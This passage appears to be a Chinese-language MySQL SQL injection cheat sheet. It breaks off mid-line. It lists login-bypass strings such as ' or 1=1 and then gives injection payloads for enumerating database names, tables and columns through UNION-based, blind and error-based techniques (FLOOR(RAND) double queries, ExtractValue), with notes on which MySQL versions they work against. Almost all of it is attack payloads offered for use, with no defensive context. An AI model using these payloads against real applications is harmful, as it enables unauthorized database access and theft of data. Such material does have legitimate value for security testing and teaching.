’ or 1=1–
’ or 1=1#
’ or 1=1/*
') or ‘1’='1–
') or (‘1’='1–
注入语句备忘
数据库名
SELECT database();
SELECT schema_name FROM information_schema.schemata;
表名
- union 查询
-- MySQL 4版本时用version=9,MySQL 5版本时用version=10
UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10; /* 列出当前数据库中的表 */
UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database(); /* 列出所有用户自定义数据库中的表 */
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql';
- 盲注
AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > ‘A’
- 报错
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));
-- 在5.1.5版本中成功。
列名
- union 查询
UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = ‘tablename’
- 盲注
AND SELECT SUBS